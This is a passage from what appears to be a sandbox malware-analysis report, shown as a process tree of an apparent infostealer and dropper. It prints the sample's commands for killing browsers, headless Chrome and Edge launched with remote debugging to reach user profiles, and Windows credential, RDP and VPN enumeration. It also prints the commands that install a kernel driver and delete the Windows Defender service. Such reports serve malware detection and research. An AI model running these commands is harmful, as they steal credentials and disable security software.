                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2128
                                  • C:\Windows\system32\taskkill.exe
                                    "taskkill" /IM brave.exe
                                    7⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1892
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      8⤵
                                        PID:2112
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM opera.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4828
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3224
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM vivaldi.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4340
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4908
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM firefox.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4776
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM dragon.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1952
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM maxthon.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1176
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM uc_browser.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4368
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM slimjet.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3968
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4720
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM cent_browser.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3244
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2652
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM epic.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3980
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM chrome.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4840
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM torch.exe
                                      7⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5100
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM Discord.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4964
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM whale.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4620
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM DiscordCanary.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1188
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        8⤵
                                          PID:4828
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM 360browser.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3744
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM DiscordPTB.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4600
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM qqbrowser.exe
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4276
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM DiscordDevelopment.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1932
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM browser.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:1892
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM chrome.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:1656
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM msedge.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:1964
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM brave.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:4880
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM opera.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:2264
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM vivaldi.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:620
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM firefox.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:452
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM dragon.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:4124
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM maxthon.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:440
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          8⤵
                                            PID:3244
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM uc_browser.exe
                                          7⤵
                                          • Kills process with taskkill
                                          PID:4220
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM slimjet.exe
                                          7⤵
                                          • Kills process with taskkill
                                          PID:232
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            8⤵
                                              PID:1656
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM cent_browser.exe
                                            7⤵
                                            • Kills process with taskkill
                                            PID:1992
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM epic.exe
                                            7⤵
                                            • Kills process with taskkill
                                            PID:3736
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM torch.exe
                                            7⤵
                                            • Kills process with taskkill
                                            PID:1384
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM whale.exe
                                            7⤵
                                              PID:4220
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                8⤵
                                                  PID:1964
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM 360browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:3996
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM qqbrowser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:3220
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:3524
                                              • C:\Windows\system32\tasklist.exe
                                                "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                7⤵
                                                • Enumerates processes with tasklist
                                                PID:2264
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=44458 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                                7⤵
                                                • Uses browser remote debugging
                                                • Checks processor information in registry
                                                • Enumerates system info in registry
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                PID:2236
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe28bddcf8,0x7ffe28bddd04,0x7ffe28bddd10
                                                  8⤵
                                                    PID:2836
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=1908,i,11245135453706163059,16437996156396337472,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1900 /prefetch:2
                                                    8⤵
                                                    • Modifies registry class
                                                    PID:4476
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2028,i,11245135453706163059,16437996156396337472,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2024 /prefetch:3
                                                    8⤵
                                                      PID:4908
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2660,i,11245135453706163059,16437996156396337472,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2644 /prefetch:8
                                                      8⤵
                                                        PID:1892
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44458 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2924,i,11245135453706163059,16437996156396337472,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2300 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:3968
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44458 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,11245135453706163059,16437996156396337472,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3188 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:5172
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44458 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3940,i,11245135453706163059,16437996156396337472,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4012 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:5384
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4548,i,11245135453706163059,16437996156396337472,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4544 /prefetch:8
                                                        8⤵
                                                          PID:5788
                                                      • C:\Windows\system32\tasklist.exe
                                                        "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                        7⤵
                                                        • Enumerates processes with tasklist
                                                        PID:6000
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /F /IM chrome.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:6044
                                                      • C:\Windows\system32\tasklist.exe
                                                        "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                        7⤵
                                                        • Enumerates processes with tasklist
                                                        PID:2320
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=40022 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        • Enumerates system info in registry
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:5604
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x240,0x7ffe28bbf208,0x7ffe28bbf214,0x7ffe28bbf220
                                                          8⤵
                                                            PID:836
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2956,i,6251491337000890801,4653257546069924483,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2948 /prefetch:2
                                                            8⤵
                                                              PID:3008
                                                          • C:\Windows\system32\tasklist.exe
                                                            "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                            7⤵
                                                            • Enumerates processes with tasklist
                                                            PID:5360
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /IM chrome.exe
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:5896
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /IM msedge.exe
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:6152
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /IM brave.exe
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:6220
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /IM opera.exe
                                                            7⤵
                                                              PID:6280
                                                            • C:\Windows\system32\taskkill.exe
                                                              "taskkill" /IM vivaldi.exe
                                                              7⤵
                                                                PID:6336
                                                              • C:\Windows\system32\taskkill.exe
                                                                "taskkill" /IM firefox.exe
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:6436
                                                              • C:\Windows\system32\taskkill.exe
                                                                "taskkill" /IM dragon.exe
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:6384
                                                              • C:\Windows\system32\taskkill.exe
                                                                "taskkill" /IM maxthon.exe
                                                                7⤵
                                                                  PID:6764
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM uc_browser.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:6380
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM slimjet.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:1592
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM cent_browser.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:3972
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM epic.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:4904
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM torch.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:1552
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM whale.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:4916
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM 360browser.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:2012
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM qqbrowser.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:5460
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /IM browser.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:2692
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /F /IM chrome.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:468
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /F /IM msedge.exe
                                                                  7⤵
                                                                    PID:5712
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /F /IM brave.exe
                                                                    7⤵
                                                                      PID:5896
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /F /IM opera.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:6212
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /F /IM vivaldi.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:6264
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /F /IM firefox.exe
                                                                      7⤵
                                                                        PID:6328
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        "taskkill" /F /IM dragon.exe
                                                                        7⤵
                                                                          PID:6396
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM maxthon.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:6448
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM uc_browser.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:392
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM slimjet.exe
                                                                          7⤵
                                                                            PID:6748
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM cent_browser.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:5960
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM epic.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:6992
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM torch.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:6884
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM whale.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:1188
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM 360browser.exe
                                                                            7⤵
                                                                              PID:6880
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM qqbrowser.exe
                                                                              7⤵
                                                                                PID:6812
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM browser.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:6584
                                                                              • C:\Windows\system32\vaultcmd.exe
                                                                                "vaultcmd" /list
                                                                                7⤵
                                                                                  PID:6508
                                                                                • C:\Windows\system32\cmdkey.exe
                                                                                  "cmdkey" /list
                                                                                  7⤵
                                                                                    PID:836
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                                                                    7⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:7004
                                                                                    • C:\Windows\system32\cmdkey.exe
                                                                                      "C:\Windows\system32\cmdkey.exe" /list
                                                                                      8⤵
                                                                                        PID:1652
                                                                                    • C:\Windows\system32\certutil.exe
                                                                                      "certutil" -store My
                                                                                      7⤵
                                                                                        PID:5936
                                                                                      • C:\Windows\system32\certutil.exe
                                                                                        "certutil" -store -user My
                                                                                        7⤵
                                                                                          PID:1384
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                                                                          7⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:2548
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                                                                          7⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Hide Artifacts: Ignore Process Interrupts
                                                                                          PID:5836
                                                                                        • C:\Windows\system32\cmdkey.exe
                                                                                          "cmdkey" /list
                                                                                          7⤵
                                                                                            PID:2576
                                                                                          • C:\Windows\system32\cmdkey.exe
                                                                                            "cmdkey" /list:TERMSRV/69.48.201.74
                                                                                            7⤵
                                                                                              PID:5212
                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                              "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                              7⤵
                                                                                                PID:2032
                                                                                              • C:\Windows\system32\hostname.exe
                                                                                                "hostname"
                                                                                                7⤵
                                                                                                  PID:1508
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:2396
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:3776
                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                  "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                  7⤵
                                                                                                    PID:6268
                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                    "netsh" advfirewall show allprofiles state
                                                                                                    7⤵
                                                                                                    • Modifies Windows Firewall
                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                    PID:6296
                                                                                                • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
                                                                                                  6⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:956
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                    7⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2688
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C6F.tmp\C70.tmp\C71.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                      8⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3276
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                        9⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:5052
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D88.tmp\D89.tmp\D8A.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                          10⤵
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3768
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1304
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc start ddrver
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2368
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 1
                                                                                                            11⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:4896
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc stop ddrver
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2816
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc start ddrver
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2112
                                                                                                          • C:\Windows\system32\takeown.exe
                                                                                                            takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                            11⤵
                                                                                                            • Possible privilege escalation attempt
                                                                                                            • Modifies file permissions
                                                                                                            PID:2116
                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                            icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                            11⤵
                                                                                                            • Possible privilege escalation attempt
                                                                                                            • Modifies file permissions
                                                                                                            PID:932
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc stop "WinDefend"
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1188
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc delete "WinDefend"
                                                                                                            11⤵
